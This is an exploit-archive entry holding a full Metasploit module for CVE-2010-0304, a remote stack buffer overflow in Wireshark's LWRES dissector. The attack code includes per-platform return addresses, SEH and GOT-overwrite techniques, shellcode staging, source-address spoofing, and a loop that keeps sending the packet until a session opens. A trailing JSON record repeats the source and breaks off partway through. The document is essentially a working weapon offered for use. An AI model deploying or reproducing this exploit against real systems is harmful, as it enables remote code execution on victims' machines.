ID 1337DAY-ID-10865 Type zdt Reporter babi Modified 2010-02-12T00:00:00
Description
Exploit for unknown platform in category remote exploits
=======================================================================
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
=======================================================================
##
# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
#require 'racket'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',
'Description' => %q{
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
overflow. This bug found and reported by babi.
This particular exploit targets the dissect_getaddrsbyname_request function. Several
other functions also contain potentially exploitable stack-based buffer overflows.
The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents
exploitation via the return address on the stack. Sending a larger string allows
exploitation using the SEH bypass method. However, this packet will usually get
fragmented, which may cause additional complications.
NOTE: The vulnerable code is reached only when the packet dissection is rendered.
If the packet is fragmented, all fragments must be captured and reassembled to
exploit this issue.
This version loops, sending the packet every X seconds until the job is killed.
},
'Author' =>
[
'babi', # original discovery/exploit
'jduck', # ported from public exploit
'redsand' # windows target/testing
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8364 $',
'References' =>
[
[ 'CVE', '2010-0304' ],
[ 'OSVDB', '61987' ],
[ 'BID', '37985' ],
[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],
[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true, # at least capture privilege
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
'DisableNops' => true,
},
'DefaultTarget' => 4,
'Targets' =>
[
[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
# breakpoint: lwres.so + 0x2ce2
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
# conveniently, edx pointed at our string..
# and so, we write it to g_slist_append's GOT entry just before its called.
# pwnt.
#
# mov [ebx+0xc],edx / jmp 0x804fc40 -->
# mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append
#
'Ret' => 0x804fc85, # see above..
'RetOff' => 376,
'Readable' => 0x804fa04, # just anything
'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append
}
],
[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
# the method for tshark doesn't work, since there aren't any convenient
# pointers lying around (in reg/close on stack)
#
# since the wireshark bin has a jmp esp, we'll just use that method..
'Ret' => 0x818fce8, # jmp esp in wireshark bin
'RetOff' => 376,
'Readable' => 0x8066a40, # just any old readable addr (unused)
'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)
}
],
[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',
{
'Arch' => ARCH_X86_64,
'Platform' => 'linux',
'Ret' => 0xfeedfed5deadbeef,
'RetOff' => 152,
}
],
[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',
{
'Arch' => ARCH_X86,
'Platform' => 'osx',
'Ret' => 0xdeadbeef,
'RetOff' => 268,
}
],
# The following target was tested against Windows XP SP3 and Windows Vista
[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
# NOTE: due to the length of this packet, your mileage may vary.
'Ret' => 0x61B4121B,
# 0x655810b6 = pop/pop/ret in libpango
# 0x02A110B6 = pop/pop/ret in libgtk-w
# 0x03D710CC = pop/mov/pop/ret in packet
# 0x61B4121B = pop/pop/ret in pcre3
'RetOff' => 2128,
}
],
],
'DisclosureDate' => 'Jan 27 2010',
# Set it to passive mode to background it.
'Stance' => Msf::Exploit::Stance::Passive))
register_options([
Opt::RPORT(921),
Opt::RHOST("239.255.255.250"),
OptAddress.new( 'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),
OptInt.new( 'DELAY', [true, 'This option sets the delay between sent packets', 5])
], self.class)
register_advanced_options([
OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ])
], self.class)
deregister_options('FILTER','PCAPFILE')
end
def exploit
ret_offset = target['RetOff']
# we have different techniques depending on the target
if (target == targets[0])
# debian tshark
str = make_nops(ret_offset - payload.encoded.length - 16)
str << payload.encoded
str << [target['GotAddr'] - 0xc].pack('V')
str << rand_text(4)
str << [target['Readable']].pack('V')
str << rand_text(4)
# ret is next
elsif (target == targets[1])
fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string
str = make_nops(ret_offset - fix_esp.length - payload.encoded.length)
str << fix_esp
str << payload.encoded
# jmp esp...
str << [target.ret].pack('V')
# jump back
distance = ret_offset + 4
str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
elsif (target == targets[4])
# ugh, /GS and UDP length issues :-/
str = make_nops(ret_offset - payload.encoded.length)
str << payload.encoded
str << generate_seh_record(target.ret)
# jump back
distance = ret_offset + 8
str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
else
# this is just a simple DoS payload
str = Rex::Text.pattern_create(ret_offset)
#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+6").encode_string
end
# add return address
#XXX: this isn't working?
#str << Rex::Arch.pack_addr(target.arch, target.ret)
str << [target.ret].pack('V')
# form the packet's payload!
sploit = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
sploit << "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
sploit << "\x00\x00\x00\x01"
sploit << [str.length].pack('n')
sploit << str
sploit << "\x00\x00"
shost = datastore['SHOST']
if (shost)
print_status("Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})")
open_pcap
n = Racket::Racket.new
n.l3 = Racket::L3::IPv4.new
n.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost)
n.l3.dst_ip = rhost
n.l3.protocol = 6
n.l3.id = rand(0x10000)
n.l3.ttl = 64
n.l4 = Racket::L4::UDP.new
n.l4.src_port = rand((2**16)-1024)+1024
n.l4.dst_port = datastore['RPORT'].to_i
n.l4.payload = sploit
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
pkt = n.pack
while true
break if session_created? and datastore['ExitOnSession']
capture_sendto(pkt, rhost)
sleep(datastore['DELAY'])
end
close_pcap
handler
else
print_status("Sending malformed LWRES packet to #{rhost} every #{datastore['DELAY']} seconds.")
handler
while true
break if session_created? and datastore['ExitOnSession']
connect_udp
udp_sock.put(sploit)
disconnect_udp
sleep(datastore['DELAY'])
end
end
end
end
# 0day.today [2018-02-06] #
{"published": "2010-02-12T00:00:00", "id": "1337DAY-ID-10865", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:01:02", "bulletin": {"published": "2010-02-12T00:00:00", "id": "1337DAY-ID-10865", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.3, "modified": "2016-04-20T01:01:02"}}, "hash": "eb2d778b951aaede91dcc90f5e58a783588582e9295fbe57a1c4beb7cab16e63", "description": "Exploit for unknown platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-20T01:01:02", "edition": 1, "title": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow", "href": "http://0day.today/exploit/description/10865", "modified": "2010-02-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/10865", "references": [], "reporter": "babi", "sourceData": "=======================================================================\r\nWireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)\r\n=======================================================================\r\n\r\n##\r\n# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n#require 'racket'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\r\n\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\r\n\t\t\t\toverflow. This bug found and reported by babi.\r\n\r\n\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\r\n\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\r\n\r\n\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\r\n\t\t\t\texploitation via the return address on the stack. Sending a larger string allows\r\n\t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\r\n\t\t\t\tfragmented, which may cause additional complications.\r\n\r\n\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\r\n\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\r\n\t\t\t\texploit this issue.\r\n\r\n\t\t\t\tThis version loops, sending the packet every X seconds until the job is killed.\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'babi', # original discovery/exploit\r\n\t\t\t\t\t'jduck', # ported from public exploit\r\n\t\t\t\t\t'redsand' # windows target/testing\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 8364 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-0304' ],\r\n\t\t\t\t\t[ 'OSVDB', '61987' ],\r\n\t\t\t\t\t[ 'BID', '37985' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged'\t=> true, # at least capture privilege\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'DefaultTarget'\t=> 4,\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t# breakpoint: lwres.so + 0x2ce2\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# conveniently, edx pointed at our string..\r\n\t\t\t\t\t\t\t# and so, we write it to g_slist_append's GOT entry just before its called.\r\n\t\t\t\t\t\t\t# pwnt.\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# mov [ebx+0xc],edx / jmp 0x804fc40 -->\r\n\t\t\t\t\t\t\t# mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t'Ret' => 0x804fc85, # see above..\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x804fa04, # just anything\r\n\t\t\t\t\t\t\t'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# the method for tshark doesn't work, since there aren't any convenient\r\n\t\t\t\t\t\t\t# pointers lying around (in reg/close on stack)\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# since the wireshark bin has a jmp esp, we'll just use that method..\r\n\t\t\t\t\t\t\t'Ret' => 0x818fce8, # jmp esp in wireshark bin\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x8066a40, # just any old readable addr (unused)\r\n\t\t\t\t\t\t\t'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86_64,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Ret' => 0xfeedfed5deadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 152,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Ret' => 0xdeadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 268,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# The following target was tested against Windows XP SP3 and Windows Vista\r\n\t\t\t\t\t[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t# NOTE: due to the length of this packet, your mileage may vary.\r\n\t\t\t\t\t\t\t'Ret' => 0x61B4121B,\r\n\t\t\t\t\t\t\t# 0x655810b6 = pop/pop/ret in libpango\r\n\t\t\t\t\t\t\t# 0x02A110B6 = pop/pop/ret in libgtk-w\r\n\t\t\t\t\t\t\t# 0x03D710CC = pop/mov/pop/ret in packet\r\n\t\t\t\t\t\t\t# 0x61B4121B = pop/pop/ret in pcre3\r\n\t\t\t\t\t\t\t'RetOff' => 2128,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 27 2010',\r\n\t\t\t# Set it to passive mode to background it.\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive))\r\n\r\n\t\tregister_options([\r\n\t\t\tOpt::RPORT(921),\r\n\t\t\tOpt::RHOST(\"239.255.255.250\"),\r\n\t\t\tOptAddress.new(\t'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),\r\n\t\t\tOptInt.new(\t\t'DELAY', [true, 'This option sets the delay between sent packets', 5])\r\n\t\t], self.class)\r\n\r\n\t\tregister_advanced_options([\r\n\t\t\tOptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ])\r\n\t\t], self.class)\r\n\r\n\t\tderegister_options('FILTER','PCAPFILE')\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tret_offset = target['RetOff']\r\n\r\n\t\t# we have different techniques depending on the target\r\n\t\tif (target == targets[0])\r\n\t\t\t# debian tshark\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length - 16)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << [target['GotAddr'] - 0xc].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\tstr << [target['Readable']].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\t# ret is next\r\n\t\telsif (target == targets[1])\r\n\t\t\tfix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"add esp,-3500\").encode_string\r\n\t\t\tstr = make_nops(ret_offset - fix_esp.length - payload.encoded.length)\r\n\t\t\tstr << fix_esp\r\n\t\t\tstr << payload.encoded\r\n\t\t\t# jmp esp...\r\n\t\t\tstr << [target.ret].pack('V')\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 4\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telsif (target == targets[4])\r\n\t\t\t# ugh, /GS and UDP length issues :-/\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << generate_seh_record(target.ret)\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 8\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telse\r\n\t\t\t# this is just a simple DoS payload\r\n\t\t\tstr = Rex::Text.pattern_create(ret_offset)\r\n\t\t\t#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string\r\n\t\tend\r\n\r\n\t\t# add return address\r\n\t\t#XXX: this isn't working?\r\n\t\t#str << Rex::Arch.pack_addr(target.arch, target.ret)\r\n\t\tstr << [target.ret].pack('V')\r\n\r\n\t\t# form the packet's payload!\r\n\t\tsploit = \"\\x00\\x00\\x01\\x5d\\x00\\x00\\x00\\x00\\x4b\\x49\\x1c\\x52\\x00\\x01\\x00\\x01\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x01\"\r\n\t\tsploit << [str.length].pack('n')\r\n\t\tsploit << str\r\n\t\tsploit << \"\\x00\\x00\"\r\n\r\n\t\tshost = datastore['SHOST']\r\n\t\tif (shost)\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})\")\r\n\t\t\topen_pcap\r\n\r\n\t\t\tn = Racket::Racket.new\r\n\r\n\t\t\tn.l3 = Racket::L3::IPv4.new\r\n\t\t\tn.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost)\r\n\t\t\tn.l3.dst_ip = rhost\r\n\t\t\tn.l3.protocol = 6\r\n\t\t\tn.l3.id = rand(0x10000)\r\n\t\t\tn.l3.ttl = 64\r\n\r\n\t\t\tn.l4 = Racket::L4::UDP.new\r\n\t\t\tn.l4.src_port = rand((2**16)-1024)+1024\r\n\t\t\tn.l4.dst_port = datastore['RPORT'].to_i\r\n\r\n\t\t\tn.l4.payload = sploit\r\n\r\n\t\t\tn.l4.fix!(n.l3.src_ip, n.l3.dst_ip)\r\n\t\t\tpkt = n.pack\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tcapture_sendto(pkt, rhost)\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\t\t\r\n\t\t\tclose_pcap\r\n\r\n\t\t\thandler\r\n\t\telse\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} every #{datastore['DELAY']} seconds.\")\r\n\r\n\t\t\thandler\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tconnect_udp\r\n\t\t\t\tudp_sock.put(sploit)\r\n\t\t\t\tdisconnect_udp\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "5b307381861d9a4c51b0e881eef973d3", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "modified"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "484c67b3fd6e747e569de85354c053d3", "key": "sourceData"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "907795d030ce45a1a44e6f3fc3f2b888", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "2c638333d43ee1d828de3652ea30ae2b", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6699589a2999644ec5b9bbfe07255d3c", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category remote exploits", "hash": "8106bfb42c139f6c6e6363bcf44fc8bcc6f6015ae98af27f6446c5cbe9d61a76", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-02-06T05:08:19"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-02-06T05:08:19", "edition": 2, "title": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow", "href": "https://0day.today/exploit/description/10865", "modified": "2010-02-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/10865", "references": [], "reporter": "babi", "sourceData": "=======================================================================\r\nWireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)\r\n=======================================================================\r\n\r\n##\r\n# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n#require 'racket'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\r\n\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\r\n\t\t\t\toverflow. This bug found and reported by babi.\r\n\r\n\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\r\n\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\r\n\r\n\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\r\n\t\t\t\texploitation via the return address on the stack. Sending a larger string allows\r\n\t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\r\n\t\t\t\tfragmented, which may cause additional complications.\r\n\r\n\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\r\n\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\r\n\t\t\t\texploit this issue.\r\n\r\n\t\t\t\tThis version loops, sending the packet every X seconds until the job is killed.\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'babi', # original discovery/exploit\r\n\t\t\t\t\t'jduck', # ported from public exploit\r\n\t\t\t\t\t'redsand' # windows target/testing\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 8364 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-0304' ],\r\n\t\t\t\t\t[ 'OSVDB', '61987' ],\r\n\t\t\t\t\t[ 'BID', '37985' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged'\t=> true, # at least capture privilege\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'DefaultTarget'\t=> 4,\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t# breakpoint: lwres.so + 0x2ce2\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# conveniently, edx pointed at our string..\r\n\t\t\t\t\t\t\t# and so, we write it to g_slist_append's GOT entry just before its called.\r\n\t\t\t\t\t\t\t# pwnt.\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# mov [ebx+0xc],edx / jmp 0x804fc40 -->\r\n\t\t\t\t\t\t\t# mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t'Ret' => 0x804fc85, # see above..\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x804fa04, # just anything\r\n\t\t\t\t\t\t\t'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# the method for tshark doesn't work, since there aren't any convenient\r\n\t\t\t\t\t\t\t# pointers lying around (in reg/close on stack)\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# since the wireshark bin has a jmp esp, we'll just use that method..\r\n\t\t\t\t\t\t\t'Ret' => 0x818fce8, # jmp esp in wireshark bin\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x8066a40, # just any old readable addr (unused)\r\n\t\t\t\t\t\t\t'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86_64,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Ret' => 0xfeedfed5deadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 152,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Ret' => 0xdeadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 268,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# The following target was tested against Windows XP SP3 and Windows Vista\r\n\t\t\t\t\t[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t# NOTE: due to the length of this packet, your mileage may vary.\r\n\t\t\t\t\t\t\t'Ret' => 0x61B4121B,\r\n\t\t\t\t\t\t\t# 0x655810b6 = pop/pop/ret in libpango\r\n\t\t\t\t\t\t\t# 0x02A110B6 = pop/pop/ret in libgtk-w\r\n\t\t\t\t\t\t\t# 0x03D710CC = pop/mov/pop/ret in packet\r\n\t\t\t\t\t\t\t# 0x61B4121B = pop/pop/ret in pcre3\r\n\t\t\t\t\t\t\t'RetOff' => 